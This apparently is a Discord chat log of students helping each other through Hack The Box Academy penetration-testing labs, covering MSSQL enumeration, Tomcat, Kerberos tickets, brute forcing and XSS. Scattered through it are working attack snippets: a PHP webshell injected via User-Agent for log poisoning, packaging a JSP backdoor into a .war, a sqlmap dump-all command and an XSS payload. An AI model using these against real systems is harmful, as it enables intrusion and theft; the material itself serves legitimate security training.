#modules
yep
mssqlclient.py username@target-ip -windows-auth
mssqlclient.py -p 1433 username@target-ip
oh wait forgot you need domain syntax
add .\\ to your username
can confirm everything is working as intended
it has been expired so
@vital adder that is not needed
hmm,,,what should i do Mr or Ms Lee?
this
ok i am trying to access
either of those command syntaxes should work
then you run through the enumeration using the mssql format
instead of show databases it's select name from master.dbo.sysdatabases
since it's windows based; capitalization does not matter
mssqlclient.py mssqlsvc@10.129.118.29 -ip -windows-auth
mssqlclient.py: error: unrecognized arguments: -ip
don't need -ip
wrong F ing tool 🤣 sorry @neon depot
their syntax target-ip is one word
i know all of you is old and knew all of htb
Geez
give me the mercy
up to you to drink it
i am already drinking beer
brother
you need monster energy
i took it already no more 2
and it should give you the prompt for a password
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(WIN-02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL>
ok
whay should i move forward
read the section
it tells you how to enumerate with sqlcmd/mssql
literally I scrolled back up and down the page to find the commands and answer
?x target-ip
i swear to god bro
it is my first time to hack whatever please///
start from the part that says "SQL syntax" on this page
if you STILL are stuck after an hour somehow then ping me
I am pure virgin
What you need help with
no
with mssqlclient we are using the command syntaxes with the black background
the only thing we don't need to do is type "go" afterwards
you already signed in with the mssqlsvc user yeah?
yes
also you're jumping too far ahead
like i said
start from the top of the syntax section
look how it's telling you to find information
I mean
that part is for hash stealing using responder
which is the other intended way of getting the mssqlsvc password
that part can be ignored entirely
more specifically it tells you how to show databases
Sorry it made me confuse a bit
Because you mean that I have to walk through again when I got password?
to right after it shows how to connect
no
you are logged in with mssqlsvc
you do not need to get another password
Yea I am
you are the user you need to be
start from this part of the page
and work your way down
Module: Attacking Common Services
Section: Skills Assessment - Medium
Just finished ACS Medium after getting stuck, The key thing is thorough enumeration of the services.
Hint || -p- all ports ||
the good ole "this port does nothing"
SQL> mysql> SHOW DATABASES;
[-] ERROR(WIN-02\SQLEXPRESS): Line 1: Incorrect syntax near '>'.
SQL>
sorry what do you mean so far?
show isn't an mssql command
and it looks like you copied the whole line
as well
you only ever need to copy after the > in the examples generally
again mssql is the linux comparable sqlcmd; so you need to go through the ones with the black background
as those will be the commands that will help you
mysql commands are only for mysql/mariadb servers
so the lines you're looking for start with 1>
Ok l with
but it sounds like you also need to spend more time actually studying and taking down notes in general
as I was able to find this information readily available on the page
it sounds like you are just trying to blitz through all the content and not actually learn anything
being a "virgin" or "noob" is not an excuse. not taking good notes will only hurt you in the long run
being frustrated at something taking time is normal; but to learn you need to really evaluate how you're going through content. If you genuinely need help on how to take good notes or what good note taking is you can probably google
for instance; nmap shows port 1433 open - states it's mssql service -> use mssqlclient.py to connect; use sqlcmd/mssql command syntax to complete. If you don't know what the syntax you need is - reread the section and take notes on things
as select name from master.dbo.sysdatabases is universal across pretty much every mssql interface to get a list of all databases
Hey, I am doing the SMB chapter in the footprinting module. At the beginning, the lesson talks about creating a share on the server. It doesn't explain how to do that. I can continue on, but I am just curious if that is on purpose or not.
it's not important for this module that's why it's not talked about; modules where creating a smb share is needed they talk about how to make one
Can someone help with Local File Inclusion Log Poisoning? Im not sure what im doing wrong.
everything :^)
Hi everyone, I'm currently stuck at Attacking Common Applications - Skills Assessment II - I've found Nagios in gitlab but I dont know how to access. Please give me a hint
For the love of god PLZ help me.
if you use double quotes try single quote or the other way around
did you add the target ip with the subdomain in to your hosts file?
i have scan with ffuf and have the list vhost. But idk exactly which one
just add all vhost you found into your hosts file and check / enum each one
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
For this code?
i mean the payload <?php system($_GET["cmd"]); ?> or <?php system($_GET['cmd']); ?> but i do it in burp so not sure if that will work
I'm having a hard time getting the burpsuite part to even work.
Ive tried with one and two quotes.
Hello, Just wondering if on the Footprinting Academy Module - Footprinting Lab - Easy that looking at the hint to gain the credentials to the FTP server is actually required? Or is there another way to gain the credentials ie hydra brute force?
Hydra bruteforcing I think
Bumping old message for help. I've just finished the hard skills assessment for the module but I just can't seem to crack this hash for the mssqlsvc user. Is this the right path?
Hi (I hope I'm in the correct channel) I'm currently doing network enumeration with nmap. I have a technical question about the status.php page in the easy/med and hard courses (ips and ids evasion) the counter on those pages goes up and down automatically.. Even when I do not interact.. Is this normal? Sometimes it just resets at 0 and most of the time when the target spawns it's already at 5 (or so) alerts. I don't mind the challenge though...
Currently doing the hard one... Let's see if this one is as easy as the prev 2 😆
Did not interact with the host and during my writing here it skipped to 30...
32
🤣
Does anyone know, why I'm getting a connection timed-out error?
When I am running smb_enumshares on metasploitable 3
```
[*] 10.0.0.4:139 - Starting module
[-] 10.0.0.4:139 - The connection with (10.0.0.4:139) timed out.
[*] 10.0.0.4:445 - Starting module
[-] 10.0.0.4:445 - Error when trying to enumerate shares - STATUS_ACCESS_DENIED
[*] 10.0.0.4: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
metasploitable 3 and kali linux both are on the same subnet.
I restarted metasploitable 3 and kali linux a few times but everything same here.
I don’t get the new task 11 😄
It’s “Congratulations”
I'm completely new to htb and I'm only just acquiring skills with Linux and co. can you tell me how to get there? so to the solution
if you form a question, we might be able to point you to the solution
Elaborate more
Welcome to the world of Linux (been using it for about 8-9 years.. Not wanting to get back to Windows after it)
Hi,
I'm stuck on the engagement at host1 in the shell & payload module.
I have find the two upload vuln.
In tomcat i have tried with metasploit and with war file upload but nothing work, metasploit not open a shell and with the var file i have an error 500.
And with the second file upload is the same,
I managed to upload shells but none of them work.
hey all present here , im new to this server
idk if this is the right place to message,but as i dont have permission to any other channels,im msging here
im a guy from India who is 16 yrs old, as a teenager it obvious that i have keen interest in learning about hacking and coding stuff
but the thing is that i dont evn know a single thing abt coding
its my greatest wish to learn hacking
is anyone here who could help me from zero?from the basics of everything?
@everyone
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@hushed smelt ^
jesus F ing christ when tf did they change that assessment?? but hint you are on the right part just remove the first 10k password from the mutated wordlist i'm dumb
that part is just a simple tomcat rev shell here is a bunch of method you can use
https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/
try with the double quote try adding &cmd=id at the end you'll know if it worked
i 100% remember that list is 90k but i just check my and why tf is it 187k + (forgot to use sort)
if you make the wordlist with the sort command the cred should be just a bit over ||1k|| and it should take like a few min with hydra also try setting your TASKS number in hydra super low or else it will crash the target machine
is there anybody who completed medium lab common services?
i cannot brute force the ftp port
just finished attacking enterprises, what a mission
had to peek a few times for hints unfortunately
Hello colleagues I connected to ssh but I do not see the print banner.
try on pwnbox
Thanks for your reply.
I was not in front of my computer.
This is what I do but for example with metasploit it doesn't work and when downloading a .war file I get a 500 error when I call the file.
On the forum others have had the same problem as me but I don't know how to solve it.
If you're stuck where I think you're stuck--where I got stuck for a while--I got unstuck by re-reading the note on the PHP Wrappers page in that module.
hey am facing a problem, am trying to create a fully interactive reverse shell, i press ctrl-Z to the nc listener, then i type stty raw -echo and then fg, but then i cant use enter to reset i get ^M
yeah automatic uploading and executing the payload with metasploit isn't going to work for this and i think this is intended
I am not aware what do you mean by zsh or bash, but am running on a kali linux terminal. By hitting enter twice, when I have to hit the enter twice ?
Well when I make a .war file I get the page with my webshell but when I execute a command I don't get a return either.
Normaly is simple to do that ...
did you try multiple shell? also give the jsp_win_cmd.jsp shell a try it's at /usr/share/davtest/backdoors/jsp_win_cmd.jsp
before that just run zip -r backup.war /usr/share/davtest/backdoors/jsp_win_cmd.jsp to make the .war file
not to be a smart arse bro but if you dont know what bash is, it may be best to do a few of the fundamentals modules
im not being smart, thats my honest advice
but if you want to proceed, these are my notes on this issue:
i know what bash is, i play with bash scripts a lot, but i dont know if am using bash or zsh.
If using bash on attacking machine:
stty raw -echo
fg <ENTER>
If using zsh on attacking machine:
stty raw -echo; fg <ENTER><ENTER>
you're probably using zsh
so try that
(i assume you've done something like python3 -c 'import pty; pty.spawn("/bin/bash")' in your session ?
yes
ok, then i would do stty raw -echo; fg <ENTER><ENTER>
thanks a lot for the help am on it rn to try it out and let u know
good luck!
I have an error 404 with this.
the only 2 shell i got in my note is that and java/jsp_shell_reverse_tcp
it worked thank you very much
awesome mate well done
HTB academy didnt teach the slightly different approach for zsh
thats why it is in my notes lol
Hello colleagues I connected to ssh but I do not see the print banner to answer the CLI windows question.
I have tried the shell you suggest with the first process and it's the same, i have the webshell page with the form but when i post a command I don't get a return.
Hello folks! I'm stuck a bit. Could someone lend a hand. Here's the info. I'm on the SQL map Essentials module. Attack tuning section. Question 2. "What's the contents of table flag6? (Case #6) " The hint is, Use the prefix '`)'. I've used that prefix. I've tried everything. The vulnerable parameter is COL and is a GET request. I will find that the parameter is vulnerable, but before I have a chance to dump any info I get booted from the server. I'm assuming because I'm running too high risk/level but that is the only way I'm finding a vulnerability. Can anyone give me some insight please?
how are you framing your command
Oh it's ok.
I can run the hostname command i have a return but with another command it's not good.
i will continue to search a good command that's works fine ...
sqlmap -r sql.txt --dbms=mysql --prefix='`)' --level=3 --risk=3 --dump-all That was most recent attempt.
Incredible i just can run 'hostname' all other command return nothing ...
Hi Im stuck in FOOTPRINTING, IMAP / POP3 & Footprinting Lab - Medium, firstly in IMAP I access to the service using claws-mail and got the second flag, also tried accessing utilizing openssl and only found that flag, im stuck in this question + 1 Enumerate the IMAP service and submit the flag as the answer. (Format: HTB{...}), secondly in the medium lab i found creds in nfs, enumerated smb and found creds for user sa, tried to access rdp and couldnt what should i try next?
im trying to connect to the machines but im not getting any live hosts
im connected to the eu location
not sure what im doing wrong
using the "lab_" vpn config I am able to connect to machines right?
i think lab_yourusername.ovpn is for hackthebox not the academy, you should try downloading from the academy webpage the following file academy-regular.ovpn
WOW. I've been struggling with that one for a while. I try a new command today after some thought. Then post here. Annnnd found the flag. lol. Perhaps I should have posted here first and it would have made the hacker gods happy and worked lol. Thanks everyone.
Machines like "precious" are in academy or labs?
By the way thanks a lot
those machines are in labs
sorry for the delay but everything is slow af on my end but basically after each command that shitty name in the url will change
how did you get the answer to the first question?
oh yeah sorry for not replying to your dm (i forgot 🤣) but that command should work not sure why it didn't the first time
in which problem do you refer the lab, or the imap
with openssl or nmap?
Yes the name in the url changes well but I have no feedback.
The only thing that is ok is hostname
A simple cd to show my current directory doesn't work like everything else
I actually used curl on the first
dm me
it's a webshell you can't cd ../
ok
cd it's just for display the current working directory.
I have tried dir C:\Shares\ and more but nothing work
I think I'm tired and stupid 😅
do pwd and start working from there
that or this old shell is dumb
i think a meterpreter shell is better although you just need to run 2 command
pwd it's was my first reflex but not work ^^
the only reason i use and suggest this stupid shell is the given attack box don't have access to the internet so to be able to get a better shell you have to download it on to your or the pwnbox machine and then upload it on to the given attack box and then the target
and this is the only default working shell (jsp for windows) that i can find
what module is this?
oh yeh, that bloody shitty foothold one
i didnt take extensive notes sorry
id suggest a different webshell tho
Thanks i will continue for find the solution.
which host are you working on
Hello guys
I'm on the Foothold host
sent you a dm
I need help with the Windows Fundamental module, section (Introduction to windows)
Just did the xfreerdp thing and remotely accessed the machine but can't find the answer to the questions asked
start powershell then
Okie, thanks! Just found a way to get through to PowerShell
Grt! I've fixed it.
But I dunno how to find the Windows NT version
you are definitely a life saver !!!!
Get off the roids, the last thing you need going thru cpts is roid rage 😜
Computer parts will be breaking
Can anyone here help?😢😢
Control panel > System
Hi
How can I authenticate on the user1 machine in windows to answer it does not come up as logged in?
you need to give us context. What module, what section.
introduction to windows command line
the user1
SSH to with user "user1" and password "previous flag"
At the moment of authentication it does not allow me to continue with the following question
I remain in the banner but it denies me access.
Hey were you able to figure this out?
that is a new module that I have not done sorry
i can assist you if you need help
i would think it would be as simple as ssh user1@<target ip> then entering the flag from the previous question as the password
anyone get errors when trying to copy/paste from pwnbox to windows victim via xfreerdp?
[WARN][com.freerdp.client.x11] - failed to get clipboard data in format UTF8_STRING [source format CF_UNICODETEXT]
@lethal atlas I tried that way with the answer and in fact I can no longer access the first ip.
likely need to respawn the target
Permission denied
hmmm let me log in and start that module.
Stuck for a couple days. Can someone please help me with the Command Injection Module Skills Assessment?
i said I could help you
Thank you. Dm.
Howdy, if anyone needs help please feel to dm me! I sometimes get busy so forgive me if it takes time to respond. Putting the names of the modules I have completed for people searching for help can find this message:
Modules completed:
Getting Started, Network Enumeration with Nmap, Footprinting, Information Gathering - Web Edition, Vulnerability Assessment, File Transfers, Shells & Payloads, Using the Metasploit Framework, Password Attacks, Attacking Common Services, Using Web Proxies, Attacking Web Applications with Ffuf, Login Brute Forcing, SQL Injection Fundamentals, SQLMap Essentials
Hey, I'm doing the linux fundamentals module and after logging in to the target via ssh its asking me "What is the name of the network interface that MTU is set to 1500?". I have no idea what this means, I'm fine with doing some googling but I've already done that for the previous 4 questions and its getting a bit tiring, am I missing something or does hack the box just give you a question without telling you how to answer it and then expect you to google for half an hour to find it?
I am on Remote Pass Attack - Network Services and having issues with WinRM user:pass. The rest of services were fast and easy. I did notice default port 5985 to open up here and there but winrm is running on a much higher port. Am I chasing a ghost?! I have narrowed down to 2 possible users that have access to winrm and neither of those are cracking.
Update: Make it 1 user, since he is in a particular local group. Had his password all this time but no luck logging in via evil-winrm
Hello!
I joined HackTheBox academy today and so far the fundamentals are a blast. I started browsing the various paths and modules and am a bit unsure of which is best suited for me. Do any of you have a path/module recommendation if I want to focus on writing websites as securely as possible? I'm more interested in the defensive aspect. Thanks in advance!
I'm currently doing 'Web Requests' and am thinking of following it up with either 'Introduction to Web Application' or 'Javascript Deobfuscation'. Are there perhaps any other relevant modules anyone can recommend?
I would suggest doing the "Bug Bounty Hunter" Job Role Path if you are interested in developing secure websites. You will get to know the different vulnerabilities and attacks that can be abused, and subsequently, you will be more capable of defending against them.
Hello! I`m working the bash scripting, currently stuck with this section, can anyone give me some guidance in the flow control loops section?
The question is this one: Create a "For" loop that encodes the variable "var" 28 times in "base64". The number of characters in the 28th hash is the value that must be assigned to the "salt" variable.
I can`t copy the script cause it's very long... has anyone done this module?
can anyone give me some help in the attacking common applications module? im on the joomla section where it wants you to exploit using the joomla_dir_trav.py script and it will not run for me. says that the module 'click' is not installed. i try to install using sudo pip install click or sudo pip3 install click. both say click is already installed but for python3. the module wants you to use the script in example as python2.7 since it doesnt work for python3. how have people been able to work around this?
Seems it`s the way you are supposed to learn... Many ways of solving the labs are not given in the readings... For me it's very difficult and I constantly ask for help here in the channel or in the academy forum...
I would add to what @kind turret said and say if you are looking not at the web side but looking for internal blue team oriented modules i would check out the Certified Penetration Testing Specialist path. both CBBH and CPTS has a bit of overlap but then divert in what is taught to specialize in one or the other. so either one you choose you can always go back to the other and have a headstart on some of the things the other path will teach you.
I would recommend to be thorough in taking notes as the material can be rather dense at times and sometimes not intuitive for people.
Nvm. This was apparently an issue with evil-winrm 3.4. Used pwnbox and worked just fine, v3.3.
yea seems like hack the box is less about teaching you and more it saying "Go find this this that I wont explain the importance of or how you should find it"
and then it just moves on as if you actually learned something
In the end you are just paying to get a certification... It`s up to you if you really want it...
Can anyone help me with Pass the ticket from Linux? I am doing "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."
this question and successfully got the flag.txt but seems like flag is not working
So we know the question is referring to a Network interface. So in terminal think about network command that you have used, and run them. Read the results and the details and see if you get something on MTU. 😉
you need to download the file from smb
i downloaded the flag
and locally you can read it
and i correctly got the flag but its not working
check for white spaces
For those running with issues using evil-winrm. Make sure to compile needed readline feature for your specific ruby version. Under Remote Path Completion on their github page.
can i dm you @autumn pilot
not sure how much it will help, but go ahead
I did that, found the answer and moved on. Its just tiring having to do 5-10 mins of unnecessary research on a question without hack the box explaining the importance of the answer and not even explaining some commands needed to find some answers
does it not tell you about the ip a command?
I get doing your own legwork but I don't see the point when you're not even told what the legwork you're doing means
isn't that the core of cybersecurity?
everything that you do in cybersecurity you will have to research
Hold on to your butt, cuz it's gonna get worse. :p however learning is growing, it's strength. Far easier to give up than try harder.
5-10 is a lot better than 30m to 5 hours
I just spent 2 hours troubleshooting evil-winrm :puphyper: shit just happens sometimes 
Yea doing your own research is but if hack the box claims to teach you cyber security I'd expect them to at least explain what you're doing
instead it just says go do this and find this and moves on without explaining at all what you just did
I dont
but I expect to be told what im doing instead of it just moving on after I completed an exercise
you are free to do the research
it is up to you if you want to do it at the end
for example
then whats the point of using hack the box if it doesnt teach it to you and instead just gives you a few prompts, doesnt explain it at all and then asks $450 a year to continue?
from the top of the page
The odds are you will seek help, you find it, you will interpret how the question was correctly answered and then the "ah ha!" moment will hit and it will make sense.
yes thats not my issue, my issue is it doesn't explain the importance of it
it's a minor thing; mostly used for getting your IP for reverse shells, and the IP of jump/pivot machines so you can do port forwarding magicks
Its like if I was to teach someone how to speak french and taught them how to conjugate a verb in the imparfait without explaining when you will use that tense or why its important
is french an universal language like the one computers are using?
you're making a mountain out of a molehill on this issue dude
no? what does that have to do with this?
Good Luck everybody, misery loves company, I'm going back to my studies.
look, rather spending the time to rant you could have spent the time to research and learn something new
So you guys dont see any issue with paying $450 a year to be 'taught' something and then being told to do all the research yourself?
dude this is a fundamental course; it's not a big issue - the more in-depth courses tend to be better at explaining
that module doesn't cost $450
okay thank you, this is what I was asking
and that is 1 module out of the dozens
go back up to my original comment I just wanted to know if this would be consistent throughout the rest of the modules
on top of that you are free to provide a feedback, but most probably provided in discord will get lost
It sounded more like you were complaining, not asking a question until you phrased it
also after each module there is a "provide feedback" option
My bad, I was wondering if the entire experience with the rest of the modules would be the same, even with the paid ones
You're hardly told to do everything yourself lol. The htb certs are some of the best I've seen. Yes, sometimes you'll need to do a bit of your own research. That's the nature of this field.
then learn better phrasing; it will help you ask better questions as well
I literally phrased it the same in my original comment, learn to scroll up
Because of how quickly things change in cybersecurity, it's nearly impossible to always give you every single piece of info you'll need.
I don't want or expect to have my hand held throughout every exercise, I just want to be told what im doing/the importance of finding the name of the network interface
it's giving you a taste of sometimes you'll be given 90% of the way to solve the problem - the other 10% can be inferred. Tools are often talked about in the module or section
like I screenshot and showed; it talked about the ip command
yea it talked about the command, but it didnt tell me what I was doing when I found the name of the network interface that had the MTU set to 1500, it just said go do it
and most commands also have a man <command> or <command> -h
I know what the command does, I don't know what the importance of the information I found with it is
ok then I'll break it down for you:
Say you need to scan for other hosts on an internal network to port forward/pivot to, you will need that Internal IP to come back to not the 10.x.x.x one.
ip a tells you every network interface that is connected - usually with htb you'll see a tun0 or something that's the <spawned ip> then other interfaces, sometimes one, sometimes 2
either submit a ticket online if you're actually serious or verify your htb account in #bot-commands with ++verify and ask for a nudge in #prolabs-dante
I am lol
coming into the academy modules chat and bitching about it does you absolutely nothing lol
Yes it does
at least post in the #1024429874246590575 where it'll be more likely to be looked at by staff
Thanks, now if only the htb courses actually taught you like any other online course instead of just asking you to answer a few questions
different modules will be more in-depth about teaching you
I hope so
and "just asking you to answer a few questions" sure if you don't read the section that the question contains
the section does not mention the importance of anything regarding the network interface
because it's rarely ever needed unless in situations where you need to pivot; and the modules that do talk about it talk more about the importance
the importance is that once you progress further you might see a computer that has both an external and internal networks
alright
@kind turret @devout cliff thank you both for the suggestions. Will look into this!
<@&861185840277487616>
?
Hmm other mod deleted it
Wassup? I have finished the module
I need some help
Q. Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Submit the contents as your response (the flag starts with Us1nG_).
Module: PtT from Linux
|| I found the location of /etc/krb5.keytab. exported it export KRB5CCNAME=/etc/krb5.keytab Then tried impersonate with kinit LINUX01$.INLANEFREIGHT.HTB -k -t /etc/krb5.keytab ||
But I get this error
||kinit: Keytab contains no suitable keys for LINUX01$.INLANEFREIGHT.HTB@INLANEFREIGHT.HTB while getting initial credentials ||
@foggy light Where else are they stored?
Hint: what is the service that is running the realm look for that folder
@foggy light There is another location that stores valuable info on kerberos info/creds
Login Brute Forcing - Skills Assessment Service Login:
Anyone mind providing some help? I understand the proper path but still the brute forcing is taking longer than I know it should. Just wanna make sure I am doing it right!
Tip: cry 🙃
already pass that 😛
cry harder
kek, look at the sections notes, the useful info will be under the crontab sections
Do realms to see what service is running the kerberos program
Then do the find to find what folder it is (without the 'd')
can I DM you ? @fathom pendant
The other thing you can do is look closely at the example images
I'm not at my computer
Did you look at the section I mentioned?
@foggy light see if you can use the find command to find any files pertaining the word ccache
also, one reason why you cant use those files is because they're locked from you. but theres a user that can read those files that you have access to(should've already compromised that user if you done the previous questions). the hint to what user that is can be found in the output of the realm command, see what groups have access to the machine
Hello Can I ask for help on Protected Files?
it says I need to use cracked password for Kira but seems like there is no credentials with Kira
should I crack it using hydra?
It's the password for kira you cracked previously in the module
Also lowercase
Hi, I just pay for subscription and got confirmation from paypal, but it is not activated in my account. Any idea why ?
I ever got the burp thing to work but i used the first method to get the question and flag.
@sinful falcon Experiencing the same problem!
Hi @pastel ginkgo , that was an interesting comment that , you first used intruder to filter out the payloads that were working and then selected those payload to use again in intruder to browse to the each generated URL. How were you able to do that? I googled and read portswigger document but only find pre-processing actions..none were we can combine payload -> pass run-following-action.. kind of method. Could you please share?
reach out to support
you just use the same list, once on upload and then once for checking for shells. you just inject at a different spot
easier if you use ffuf and not burps slow ass intruder
I was able to get a long list of payloads (many-char-bypass X 5-6 PHP extensions) so kind of 100+ payloads which got uploaded, so the first problem i was facing was to get this list of payloads which passed (as there were many which didn't). Tried a lot to find a way to copy only the passing payloads from intruder. Then when i wrote to you, i was thinking in the wrong direction, that while checking the URL (with payload), i need to only keep the URL till php/phtml/pht and remove special chars (like &,.../ , X00)...realized i was wrong. And finally able to solve the exercise.
Thanks for responding. I agree using intruder is slow in community, but i am using a profession burp..so it was not a problem for me
burp pro is super overkill for these modules but hey whatever floats your boat and doesnt sink your rubber ducky
how do i get the list of groups in AD im part of through CME ?
i think cme has the -x or -c syntax that you put at the end to have it run a specific command once it finds/uses a valid login
hi everyone
can someone help with the password attacks module. im on the active directory part. i have made copies of the NTDs.dit file and im tryin to file share it back to my host machine. but im getting the same error
try specifying a filename
as in \\yourip\share\filename
I’m a little lost on Attacking Common Services: Attacking email services. I’ve attempted to utilize smtp-user-enum with the provided resource username list from the module but none of those usernames exist.
attacking sql is expecting you to do the Responder hash grabbing
i think
its specified "cmd.exe /c move C:\NTDS.dit \10.10.14.177\CompData"
My apologies! I don’t know why I put Attacking SQL databases. I meant Attacking Email services
do a full port scan
just try :)
is this what you mean?
I see 3389 open but would need creds/hash to connect. Attempted previous creds/hash from previous sections. Didn’t work. Pop3 and imap open but would need credz as well or am I wrong? Found the domain with full port scan and mapped it to the target ip address and attempted the smtp-user-enum with that domain but didn’t work.
What I ended up doing is using smtp-user-enum and tried all 3 modes one at a time, specified by the -M command line operator ||RCPT, VRFY, EXPN || using the provided username list in the Resources tab. My thinking was if I could at least get a valid user that will drastically reduce the resource requirements for a hydra brute force
I just redownloaded the username list from resource to ensure I was utilizing the correct list. Attempted all 3 modes and didn’t get any hits for users
I just tested it myself and found the user || smtp-user-enum -M RCPT -U username.list -D inlanefreight.htb -t <spawned ip> ||
Oh shoot. I was utilizing the domain I found in my nmap scan for port 3389. Thank you! That worked!
Hey all, working on the kernel exploit module for linux priv esc. Can't seem to compile the exploit on my Kali box, or when I can I can't get it to run on the target. Error message when I try to run on the target:
htb-student@NIX02:~$ ./exploit1
./exploit1: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit1)
Trying to figure out what I need to tweak here. Tried installing a updating a few different things
google it is the short answer
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_pwsh?view=powershell-7.3 scroll down a bit
literally the first thing you should do is ask google; if google is not providing a sufficient answer then ask elsewhere such as #1024429874246590575 as it is not necessarily tied to a module and they want to keep this chat as on-topic to module content as possible
I have a quick question on this module https://academy.hackthebox.com/module/147/section/1328 Password Attacks: Password Reuse / Default Passwords
is it asking to find the password to the MySQL account or to who can use MySQL?
Hey i have an idea that would make profit. I want to make it happen.
I need someone who can code.
I need bot that does basic stuffs.
it's asking for the username:password combo as stated in the question
yes i understand that part. but is it asking for the mysql account password combo or the user account that can open mysql
It's stating; that using the credentials from the previous exercise ssh into the system and determine what credentials can be used to access MySQL
the DefaultCreds-Cheat-Sheet is useful
got it thanks. i guess it failed the install a few times so i had to run it from the folder.
Hello, I am having great difficulty completing the PassTheHash topic in password attacks module. I am stuck on the last step where you have to setup a nc.exe on the host machine to pass the hash and connect to another machine on the domain. I have followed the steps exactly, but no RS is connecting. I have type 'ipconfig' and tried to use both IPs that were there. I have tried to use Different PS Reverseshell scripts but no avail. I have tried different ports, but nothing works. Looks like the domain firewall is off so I dont see why the RS is not working. Not sure where to go from here, seems like someone in the forum couldnt get a RS either and used LOLbins to somehow connect to the target. Any help? thanks so much, dm me plz
Password Attacks - Hard Lab
I got the file .vhd on my linux machine and I'm not sure how to continue? please if anybody could help me here or in dms I'd really appreciate it🙏
Hey, I'm doing nmap's medium lab, the one where you find a host's DNS service number, and I think I'm doing the correct thing but nothing's happening
actually I think I might have something?
File Transfers - Protected File Transfers
I want to transfer Invoke-AESEncryption.ps1 to a Windows host that is not connected to the internet so I cant download the script directly from the win host. I am connected to the host via rdp. What I want to do is download the Invoke-AESEncryption.ps1 to my kali machine and then transfer it to the victim. However, I cannot seem to download the script to kali. It always downloads the html file of the page instead of the script. How can I download just the script? Thanks in advance!
What URL are you trying to download from?
It doesn't look like this site offers any raw download method. You'd have to either rig something up to extract the data, or manually copy/paste it.
Yeah, indeed. I was just wondering if there's some clever way to do that. Maybe also via github since I found the same script there.
I have problem crackmapexec doesnt go trough the list. Instead it just takes it as the username
Try giving it a full path to the file
I mean completely full path, with the /opt/useful/etc...
Hello everyone, im trying to verify over #bot-commands but i can't find my HTB Academy account token on the website, all i see is student id
there isn't one, the discord token is only available on accounts created on hackthebox.com
Is anyone goood at automation?
Ah yes that worked thanks!
thank you, i was going insane trying to find that
so i need to create a new account over hackthebox.com right?
I need sort of automation that click on specific section depending on situation
yes
I'm trying to run responder and inveigh in the AD Enumeration & Attacks - Skills Assessment Part I lab, but I'm not able to. What am I missing? Should I convert inveigh.ps1 to Inveigh.exe?
What do you mean when you say you're not able to? Are you getting an error?
For example, I run Responder.py and it just hangs. I get no output
and what did you get from inveigh?
I have the same problem...for two weeks. Any improvement?
You might want to go back over the sections that cover using inveigh.
I'm stuck on this question I don't understand it well Use the tasklist command to print the started services and then sort them in reverse order by name. The service name starting with "vm" is the flag for this user.
can i help me?
What was the issue here? Same problem. Can you help? god, found it...
Hi ! im stuck in the "Information Gathering - Web - Skills Assessment" with the following question : 'Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?' i tried with cURL, dig and nslookup , i tried on the main domain too but i cant find something relevant. Could someone give me a hand ?
Use AutoRecon.
Would you like to come in private 🤔
Check this out. If you then need to know more, send me a DM. Tib3rius has also placed an instruction video on YouTube. https://github.com/Tib3rius/AutoRecon
Guys.
Need a little hint on Broken Authentication -skill assessment
I am just mathematician.
Strategy is going to work. 1 cent for 10 second
I need automation to that.
yeah this is not the place for that
sure what's the issue?
I found some users and their passwords,
if you just look here about that file you can probably find the answer of what that file is
sure shoot me a dm if you still need help i'll help you troubleshoot
if the ||support|| user?
yeah
got the cookie "something":||md5||
but I dont know how to enumerate the role)
yeah it looks like but https://crackstation.net/ can't recognise it
I don't know why:)
I've tried change the role from "support" to "admin" etc but still resultless
I don't have my notes present right now, but i remember this has something to do with the example given. Don't copy the example. Go to the revshell site mentioned, create your own shell. Use both a different port and state the target by IP not by hostname (DC01 or something).
one of the thing you try is almost right
hint just are ||missing 1|| thing
Use the tasklist command to print the started services and then sort them in reverse order by name. The name of the service that begins with "vm" is the flag for this user. i don't understand
thanks, I have to to figure out what I missed:))
That was not the solution
I have heard that there is app that can
Automate few stuffs depending on x.y color changes etc
so what don't you understand? the sort them in reverse order by name part?
@vital adder That is the question
But I list the services with tasklist and I find the .exe with the initials "vm" but the flag does not appear.
which module and section are you on?
I think something else is missing because I have tried to do several things but I don't see an answer.
@vital adder
INTRODUCTION TO WINDOWS COMMAND LINE
-->skills assessment
@vital adder user9 question
so you was doing it on the DC right?
yes
flag is the .exe file name
no
@forest tapir @rough thunder Can I DM you about this one?
sure.
Hi, I need some help with AD Enum & Attacks.
There's only 3 possible options, so worst-case, you can bruteforce it lol
All 3 failed?
I can't SSH from MS01 to Linux Host (permission denied) .
Hi everyone! how you doing? Any hint on the "Guessable Answer" from Broken Authentication module,
question: Reset the htbadmin user's password by guessing one of the questions. What is the flag?
XSS module
Q: Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag.
I am just starting the question, and I haven't been able to even get going with any code execution. When I try to inject into the url, there are already single quotes which appear in the html. so I have been playing around with the encoding of the url, and there is one bloody single quote at the end of the injection that is there by default. If you know how to get rid of the single quote, or have any nudges in other directions, plz halp.
Encoded injection:
%2Fimages%2Fcat.jpg' onload%3D"alert('THM')%3B"
html result with single quote at the end of injection
I tried to get a little more creative and came up with this, but still not working. Perhaps I have overlooked something 
Hello everybody! Someone could help me on AD skill assessment ? Im on the first host MS** with ps remoting but I can just use whoami or hostname, I cant move with cd.. how I can put Nc.exe on this second host?
